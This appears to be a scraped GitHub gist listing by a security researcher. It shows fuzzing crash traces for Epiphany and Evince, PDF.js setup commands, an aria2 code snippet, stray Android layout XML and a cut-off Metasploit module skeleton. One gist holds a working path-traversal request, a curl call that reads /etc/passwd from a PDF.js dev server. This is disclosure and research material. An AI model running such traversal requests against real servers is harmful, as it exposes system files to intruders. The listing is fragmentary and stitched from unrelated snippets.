Dhiraj Mishra RootUp

@RootUp
RootUp / Fuzz-1.html
Created November 2, 2018 19:33
Fuzzing Epiphany
Identified by BFuzz (https://github.com/rootup/bfuzz)
Product: Web epiphany 3.28.1
Trace:
===Thread 29 "pool" received signal SIGSEGV, Segmentation fault.===
[Switching to Thread 0x7fff4ffff700 (LWP 28046)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7078c96 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe850 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
@RootUp
RootUp / afl.sh
Created November 12, 2018 06:20
afl-fuzz
$ afl-fuzz -i in/ -o out/ ./binary @@ /dev/null
@RootUp
RootUp / trace.txt
Created November 12, 2018 06:28
CVE-2018-19149
(gdb) run NullPointer.h_134
Starting program: /usr/bin/evince NullPointerDeference.h_134
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fd84d3cf700 (LWP 17587)]
[New Thread 0x7fd84cbce700 (LWP 17588)]
[New Thread 0x7fd84718c700 (LWP 17589)]
[New Thread 0x7fd84651c700 (LWP 17594)]
[New Thread 0x7fd845b0e700 (LWP 17596)]
[New Thread 0x7fd83223e700 (LWP 17597)]
@RootUp
RootUp / MozPDF.js
Created November 15, 2018 06:18
Mozilla PDF.js
$ git clone https://github.com/mozilla/pdf.js.git
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server
@RootUp
RootUp / gulpfile.js
Created November 15, 2018 06:23
Mozilla PDF.js
gulp.task('baseline', function (done) {
  console.log();
  console.log('### Creating baseline environment');
  var baselineCommit = process.env['BASELINE'];
  if (!baselineCommit) {
    done(new Error('Missing baseline commit. Specify the BASELINE variable.'));
    return;
  }
@RootUp
RootUp / gulpfile.js
Created November 15, 2018 06:32
Mozilla PDF.js
input0@zero:~/Desktop/pdf.js$ gulp server
[11:58:49] Using gulpfile ~/Desktop/pdf.js/gulpfile.js
[11:58:49] Starting 'server'...
### Starting local server
Server running at http://localhost:8888/
@RootUp
RootUp / Path.js
Created November 15, 2018 06:40
Mozilla PDF.js
input0@zero:~$ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8888
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
@RootUp
RootUp / HttpConnection.cc
Created January 6, 2019 10:27
HttpConnection.cc
// https://github.com/aria2/aria2/blob/37368130ca7de5491a75fd18a20c5c5cc641824a/src/HttpConnection.cc
std::string result;
std::string line;
while (getline(istr, line)) {
  if (util::startsWith(line, "Authorization: Basic")) {
    result += "Authorization: Basic ********\n";
  }
  else if (util::startsWith(line, "Proxy-Authorization: Basic")) {
    result += "Proxy-Authorization: Basic ********\n";
  }
<android.support.design.widget.CoordinatorLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior"
xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto">
<FrameLayout android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:background="@color/white" android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:id="@id/ll_title_lock_setting" android:background="@color/feature_setting_background" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content">
<LinearLayout android:orientation="horizontal" android:paddingTop="@dimen/y4" android:layout_width="fill_parent" android:layout_height="wrap_content">
<TextView and
@RootUp
RootUp / MSF_bodycode.rb
Created February 19, 2019 12:50
Fuzzing webkit
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer
  def run
    exploit # start http server
  end
  def setup
    @html = %|
JS goes here!